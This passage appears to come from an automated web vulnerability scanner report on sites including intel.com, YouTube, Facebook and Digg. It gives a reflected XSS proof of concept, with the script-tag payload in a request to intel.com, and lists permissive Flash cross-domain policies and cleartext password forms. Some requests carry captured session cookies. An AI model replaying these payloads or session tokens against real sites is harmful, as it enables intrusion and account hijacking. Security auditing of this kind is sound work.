iid=gg_about+intel_pressroom97bc3<script>alert(1)</script>00808251755

4.99. http://www.intel.com/pressroom/index.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /pressroom/index.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cfeb6<script>alert(1)</script>8732c9cbc96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pressroom/index.htm?cfeb6<script>alert(1)</script>8732c9cbc96=1 HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://newsroom.intel.com/index.jspa?cfeb6<script>alert(1)</script>8732c9cbc96=1
Content-Length: 43
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:33 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=CNNMGNPABDJEOBDKJLPLFJNJ; path=/

cfeb6<script>alert(1)</script>8732c9cbc96=1

5. Flash cross-domain policy
There are 4 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://i.ytimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.ytimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: i.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Wed, 02 Feb 2011 19:09:36 GMT
Expires: Wed, 09 Feb 2011 19:09:36 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 273794
Content-Length: 102

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.2. http://gdata.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gdata.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: gdata.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 10 Sep 2010 10:34:33 GMT
Date: Sat, 05 Feb 2011 23:12:40 GMT
Expires: Sat, 05 Feb 2011 23:12:40 GMT
Cache-Control: private, max-age=7200
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Content-Length: 10055

<?xml version="1.0"?>
<!-- http://gdata.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ac"/>
<allow-access-from domain="*.ad"/>
<allow-access-from domain="*.ae"/>
<allow-access-from domain="*.aero"/>
<allow-access-from domain="*.af"/>
<allow-access-from domain="*.ag"/>
<allow-access-from domain="*.ai"/>
<allow-access-from domain="*.al"/>
<allow-access-from domain="*.am"/>
<allow-access-from domain="*.an"/>
<allow-access-from domain="*.ao"/>
<allow-access-from domain="*.aq"/>
<allow-access-from domain="*.ar"/>
<allow-access-from domain="*.arpa"/>
<allow-access-from domain="*.as"/>
<allow-access-from domain="*.asia"/>
<allow-access-from domain="*.at"/>
<allow-access-from domain="*.au"/>
<allow-access-from domain="*.aw"/>
<allow-access-from domain="*.ax"/>
<allow-access-from domain="*.az"/>
<allow-access-from domain="*.ba"/>
<allow-access-from domain="*.bb"/>
<allow-access-from domain="*.bd"/>
<allow-access-from domain="*.be"/>
<allow-access-from domain="*.bf"/>
<allow-access-from domain="*.bg"/>
<allow-access-from domain="*.bh"/>
<allow-access-from domain="*.bi"/>
<allow-access-from domain="*.biz"/>
<allow-access-from domain="*.bj"/>
<allow-access-from domain="*.bm"/>
<allow-access-from domain="*.bn"/>
<allow-access-from domain="*.bo"/>
<allow-access-from domain="*.br"/>
<allow-access-from domain="*.bs"/>
<allow-access-from domain="*.bt"/>
<allow-access-from domain="*.bw"/>
<allow-access-from domain="*.by"/>
<allow-access-from domain="*.bz"/>
<allow-access-from domain="*.ca"/>
<allow-access-from domain="*.cat"/>
<allow-access-from domain="*.cc"/>
<allow-access-from domain="*.cd"/>
<allow-access-from domain="*.cf"/>
<allow-access-from domain="*.cg"/>
<allow-access-from domain="*.ch"/>
<allow-access-from domain="*.ci"/>
<allow-access-from domain="*.ck"/>
<allow-access-from domain="*.cl"/>
<allow-access-from domain="*.cm"/>
<allow-access-from domain="*.cn"/>
<allow-access-from domain="*.co"/>
<allow-access-from domain="*.com"/>
<allow-access-from domain="*.coop"/>
<allow-access-from domain="*.cr"/>
<allow-access-from domain="*.cu"/>
<allow-access-from domain="*.cv"/>
<allow-access-from domain="*.cx"/>
<allow-access-from domain="*.cy"/>
<allow-access-from domain="*.cz"/>
<allow-access-from domain="*.de"/>
<allow-access-from domain="*.dj"/>
<allow-access-from domain="*.dk"/>
<allow-access-from domain="*.dm"/>
<allow-access-from domain="*.do"/>
<allow-access-from domain="*.dz"/>
<allow-access-from domain="*.ec"/>
<allow-access-from domain="*.edu"/>
<allow-access-from domain="*.ee"/>
<allow-access-from domain="*.eg"/>
<allow-access-from domain="*.er"/>
<allow-access-from domain="*.es"/>
<allow-access-from domain="*.et"/>
<allow-access-from domain="*.eu"/>
<allow-access-from domain="*.fi"/>
<allow-access-from domain="*.fj"/>
<allow-access-from domain="*.fk"/>
<allow-access-from domain="*.fm"/>
<allow-access-from domain="*.fo"/>
<allow-access-from domain="*.fr"/>
<allow-access-from domain="*.ga"/>
<allow-access-from domain="*.gd"/>
<allow-access-from domain="*.ge"/>
<allow-access-from domain="*.gf"/>
<allow-access-from domain="*.gg"/>
<allow-access-from domain="*.gh"/>
<allow-access-from domain="*.gi"/>
<allow-access-from domain="*.gl"/>
<allow-access-from domain="*.gm"/>
<allow-access-from domain="*.gn"/>
<allow-access-from domain="*.gov"/>
<allow-access-from domain="*.gp"/>
<allow-access-from domain="*.gq"/>
<allow-access-from domain="*.gr"/>
<allow-access-from domain="*.gs"/>
<allow-access-from domain="*.gt"/>
<allow-access-from domain="*.gu"/>
<allow-access-from domain="*.gw"/>
<allow-access-from domain="*.gy"/>
<allow-access-from domain="*.hk"/>
<allow-access-from domain="*.hm"/>
<allow-access-from domain="*.hn"/>
<allow-access-from domain="*.hr"/>
<allow-access-from domain="*.ht"/>
<allow-access-from domain="*.hu"/>
<allow-access-from domain="*.id"/>
<allow-access-from domain="*.ie"/>
<allow-access-from domain="*.il"/>
<allow-access-from domain="*.im"/>
<allow-access-from domain="*.in"/>
<allow-access-from domain="*.info"/>
<allow-access-from domain="*.int"/>
<allow-access-from domain="*.io"/>
<allow-access-from domain="*.iq"/>
<allow-access-from domain="*.ir"/>
<allow-access-from domain="*.is"/>
<allow-access-from domain="*.it"/>
<allow-access-from domain="*.je"/>
<allow-access-from domain="*.jm"/>
<allow-access-from domain="*.jo"/>
<allow-access-from domain="*.jobs"/>
<allow-access-from domain="*.jp"/>
<allow-access-from domain="*.ke"/>
<allow-access-from domain="*.kg"/>
<allow-access-from domain="*.kh"/>
<allow-access-from domain="*.ki"/>
<allow-access-from domain="*.km"/>
<allow-access-from domain="*.kn"/>
<allow-access-from domain="*.kr"/>
<allow-access-from domain="*.kw"/>
<allow-access-from domain="*.ky"/>
<allow-access-from domain="*.kz"/>
<allow-access-from domain="*.la"/>
<allow-access-from domain="*.lb"/>
<allow-access-from domain="*.lc"/>
<allow-access-from domain="*.li"/>
<allow-access-from domain="*.lk"/>
<allow-access-from domain="*.local"/>
<allow-access-from domain="*.lr"/>
<allow-access-from domain="*.ls"/>
<allow-access-from domain="*.lt"/>
<allow-access-from domain="*.lu"/>
<allow-access-from domain="*.lv"/>
<allow-access-from domain="*.ly"/>
<allow-access-from domain="*.ma"/>
<allow-access-from domain="*.mc"/>
<allow-access-from domain="*.md"/>
<allow-access-from domain="*.me"/>
<allow-access-from domain="*.mg"/>
<allow-access-from domain="*.mh"/>
<allow-access-from domain="*.mil"/>
<allow-access-from domain="*.mk"/>
<allow-access-from domain="*.ml"/>
<allow-access-from domain="*.mm"/>
<allow-access-from domain="*.mn"/>
<allow-access-from domain="*.mo"/>
<allow-access-from domain="*.mobi"/>
<allow-access-from domain="*.mp"/>
<allow-access-from domain="*.mq"/>
<allow-access-from domain="*.mr"/>
<allow-access-from domain="*.ms"/>
<allow-access-from domain="*.mt"/>
<allow-access-from domain="*.mu"/>
<allow-access-from domain="*.museum"/>
<allow-access-from domain="*.mv"/>
<allow-access-from domain="*.mw"/>
<allow-access-from domain="*.mx"/>
<allow-access-from domain="*.my"/>
<allow-access-from domain="*.mz"/>
<allow-access-from domain="*.na"/>
<allow-access-from domain="*.name"/>
<allow-access-from domain="*.nc"/>
<allow-access-from domain="*.ne"/>
<allow-access-from domain="*.net"/>
<allow-access-from domain="*.nf"/>
<allow-access-from domain="*.ng"/>
<allow-access-from domain="*.ni"/>
<allow-access-from domain="*.nl"/>
<allow-access-from domain="*.no"/>
<allow-access-from domain="*.np"/>
<allow-access-from domain="*.nr"/>
<allow-access-from domain="*.nu"/>
<allow-access-from domain="*.nz"/>
<allow-access-from domain="*.om"/>
<allow-access-from domain="*.org"/>
<allow-access-from domain="*.pa"/>
<allow-access-from domain="*.pe"/>
<allow-access-from domain="*.pf"/>
<allow-access-from domain="*.pg"/>
<allow-access-from domain="*.ph"/>
<allow-access-from domain="*.pk"/>
<allow-access-from domain="*.pl"/>
<allow-access-from domain="*.pn"/>
<allow-access-from domain="*.pr"/>
<allow-access-from domain="*.pro"/>
<allow-access-from domain="*.ps"/>
<allow-access-from domain="*.pt"/>
<allow-access-from domain="*.pw"/>
<allow-access-from domain="*.py"/>
<allow-access-from domain="*.qa"/>
<allow-access-from domain="*.re"/>
<allow-access-from domain="*.ro"/>
<allow-access-from domain="*.rs"/>
<allow-access-from domain="*.ru"/>
<allow-access-from domain="*.rw"/>
<allow-access-from domain="*.sa"/>
<allow-access-from domain="*.sb"/>
<allow-access-from domain="*.sc"/>
<allow-access-from domain="*.sd"/>
<allow-access-from domain="*.se"/>
<allow-access-from domain="*.sg"/>
<allow-access-from domain="*.sh"/>
<allow-access-from domain="*.si"/>
<allow-access-from domain="*.sk"/>
<allow-access-from domain="*.sl"/>
<allow-access-from domain="*.sm"/>
<allow-access-from domain="*.sn"/>
<allow-access-from domain="*.sr"/>
<allow-access-from domain="*.st"/>
<allow-access-from domain="*.su"/>
<allow-access-from domain="*.sv"/>
<allow-access-from domain="*.sy"/>
<allow-access-from domain="*.sz"/>
<allow-access-from domain="*.tc"/>
<allow-access-from domain="*.td"/>
<allow-access-from domain="*.tel"/>
<allow-access-from domain="*.tf"/>
<allow-access-from domain="*.tg"/>
<allow-access-from domain="*.th"/>
<allow-access-from domain="*.tj"/>
<allow-access-from domain="*.tk"/>
<allow-access-from domain="*.tl"/>
<allow-access-from domain="*.tm"/>
<allow-access-from domain="*.tn"/>
<allow-access-from domain="*.to"/>
<allow-access-from domain="*.tr"/>
<allow-access-from domain="*.travel"/>
<allow-access-from domain="*.tt"/>
<allow-access-from domain="*.tv"/>
<allow-access-from domain="*.tw"/>
<allow-access-from domain="*.tz"/>
<allow-access-from domain="*.ua"/>
<allow-access-from domain="*.ug"/>
<allow-access-from domain="*.uk"/>
<allow-access-from domain="*.us"/>
<allow-access-from domain="*.uy"/>
<allow-access-from domain="*.uz"/>
<allow-access-from domain="*.va"/>
<allow-access-from domain="*.vc"/>
<allow-access-from domain="*.ve"/>
<allow-access-from domain="*.vg"/>
<allow-access-from domain="*.vi"/>
<allow-access-from domain="*.vn"/>
<allow-access-from domain="*.vu"/>
<allow-access-from domain="*.ws"/>
<allow-access-from domain="*.ye"/>
<allow-access-from domain="*.yu"/>
<allow-access-from domain="*.za"/>
<allow-access-from domain="*.zm"/>
<allow-access-from domain="*.zw"/>
<allow-access-from domain="localhost"/>
<allow-access-from domain="127.0.0.1"/>
...[SNIP]...

5.3. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
Connection: close
Content-Length: 1581

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="external.ak.fbcdn.com" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="external.ak.fbcdn.net" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
...[SNIP]...

5.4. http://www.intel.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intel.com

Response

HTTP/1.0 200 OK
Content-Length: 290
Content-Type: text/xml
Last-Modified: Tue, 10 Jan 2006 16:04:48 GMT
Accept-Ranges: bytes
ETag: "78bab694ff15c61:4299"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Date: Sat, 05 Feb 2011 23:13:36 GMT
Connection: close

...<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.spillinova.com" />
<allow-access-from domain="*.intel.com" />
<allow-access-from domain="*.intel.com/cd/" />
<allow-access-from domain = "intel.speedera.net"/>
...[SNIP]...

6. Cleartext submission of password
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://digg.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
Set-Cookie: d=15436670eec4b706dbd3007684ea2ebb76af60eb4cc681ce1bc0e799ee3bcc18; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21375 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.2. http://www.ericmmartin.com/projects/simplemodal/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ericmmartin.com
Path:   /projects/simplemodal/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 05 Feb 2011 20:00:09 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33772


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<div id="simplemodal-login-form" style="display:none">
   <form name="loginform" id="loginform" action="http://www.ericmmartin.com/wordpress/wp-login.php" method="post">
       <div class="title">
...[SNIP]...
<br />
           <input type="password" name="pwd" class="user_pass input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

6.3. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/channel/distributor/asmo-na/eng/index.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /cd/channel/distributor/asmo-na/eng/index.htm?iid=subhdr+ptr_chan_disti HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G08
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:36 GMT
Date: Sat, 05 Feb 2011 23:18:36 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35633

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
<div id="hptopwhite"><form id="Form1" method="post" name="Form1"><table cellpadding="0" cellspacing="0" border="0" width="95%" align="center">
...[SNIP]...
<td><input id="txtPassword" onkeydown="if(event.keyCode==13) javascript:rememberme_check(param_a,param_b);" type="password" name="txtPassword"></td>
...[SNIP]...

6.4. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/channel/reseller/asmo-na/eng/index.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /cd/channel/reseller/asmo-na/eng/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; 